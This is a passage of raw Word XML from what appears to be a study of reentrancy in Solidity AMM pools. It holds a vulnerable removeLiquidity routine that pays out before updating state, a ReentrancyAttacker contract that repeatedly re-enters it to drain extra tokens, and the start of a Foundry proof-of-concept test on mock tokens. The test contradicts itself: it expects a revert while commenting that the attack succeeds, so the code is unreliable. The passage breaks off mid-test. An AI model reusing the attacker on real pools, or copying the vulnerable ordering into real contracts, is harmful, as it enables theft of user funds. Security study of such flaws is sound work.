    <w:p w14:paraId="1FDE07F1" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        uint256 totalLp = lpToken.totalSupply();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E365FE" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        amountA = (liquidity * reserveA) / totalLp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CC9903" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        amountB = (liquidity * reserveB) / totalLp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7516FCD3" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DEE2AB5" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        // INTERACTIONS BEFORE EFFECTS — vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E92591" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        tokenA.transfer(msg.sender, amountA);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F52EDE9" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        tokenB.transfer(msg.sender, amountB);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7DF35D" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19EE0A08" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        lpToken.burn(msg.sender, liquidity);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C03A72D" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        reserveA -= amountA;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13315420" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        reserveB -= amountB;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6674FCE1" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE4D1BF" w14:textId="311638DA" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C0C12D" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>// SPDX-License-Identifier: MIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BFADD8" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>pragma solidity ^0.8.24;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387D10C9" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F9B647" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {IERC20} from "openzeppelin-contracts/contracts/token/ERC20/IERC20.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D291AA" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072B18BA" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>interface IAMMPoolVulnerable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6055B0"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function removeLiquidity(uint256 liquidity) external returns (uint256 amountA, uint256 amountB);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C40AAA" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DA11C5" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E88FA0" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>contract ReentrancyAttacker {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDADDE4"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IAMMPoolVulnerable public pool;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237F5BD5"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IERC20 public tokenA;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F2B259"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uint256 public reenterCount;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B0F478"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uint256 public constant MAX_REENTRIES = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739F8E43" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B21850B"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constructor(address pool_, address tokenA_) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF9D5A1"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pool = IAMMPoolVulnerable(pool_);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E856B24"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tokenA = IERC20(tokenA_);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6BFBE7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAB8CC1" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C43BF06"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function attack(uint256 lpAmount) external {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E042D23"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reenterCount = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51445707"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pool.removeLiquidity(lpAmount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CB940A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFB1E13" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15BD7B99"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function onERC20Received(address, address, uint256, bytes calldata) external returns (bytes4) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213B5501"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if (reenterCount &lt; MAX_REENTRIES) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C38D895"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reenterCount++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9C870"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pool.removeLiquidity(1); // re-enter while reserves unchanged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEB3159"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D11A2B"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return this.onERC20Received.selector;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E5C09C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E3FA67" w14:textId="661AE41B" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1695D2A3" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F01D347" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Foundry test — attack succeeds on vulnerable pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4460EA" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>// SPDX-License-Identifier: MIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1346AA7B" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>pragma solidity ^0.8.24;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1906F060" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A40557D" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {Test} from "forge-std/Test.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511C623E" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {MockERC20} from "../../contracts/mocks/MockERC20.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F1C974" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {AMMPoolVulnerable} from "../mocks/AMMPoolVulnerable.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECA3450" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {ReentrancyAttacker} from "../mocks/ReentrancyAttacker.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E45E4B7" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A63F980" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>contract AMMPoolReentrancyVulnerableTest is Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7867861A"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MockERC20 tokenA;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36909526"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MockERC20 tokenB;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B69677"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AMMPoolVulnerable pool;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB72DE4"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ReentrancyAttacker attacker;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04687BCB" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3761C6E1"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function setUp() public {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D177F0E"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tokenA = new MockERC20("A", "A");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49720358"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tokenB = new MockERC20("B", "B");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F716D8"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pool = new AMMPoolVulnerable(address(tokenA), address(tokenB));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63342812" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F21EF1"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tokenA.mint(address(this), 1_000 ether);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D99ECAC"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tokenB.mint(address(this), 1_000 ether);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15197C9F"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tokenA.transfer(address(pool), 100 ether);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCE9617"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tokenB.transfer(address(pool), 100 ether);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496097EB" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        // assume LP minted to attacker for PoC brevity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B0E89E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D8AB7F" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D380685"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function test_reentrancy_drains_extra_tokens_vulnerable() public {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295EFEEC"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attacker = new ReentrancyAttacker(address(pool), address(tokenA));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C667F13"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uint256 balBefore = tokenA.balanceOf(address(attacker));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4325BF7D" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2FF21C"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vm.expectRevert(); // may not revert on vulnerable — attack succeeds</w:t>
      </w:r>
    </w:p>
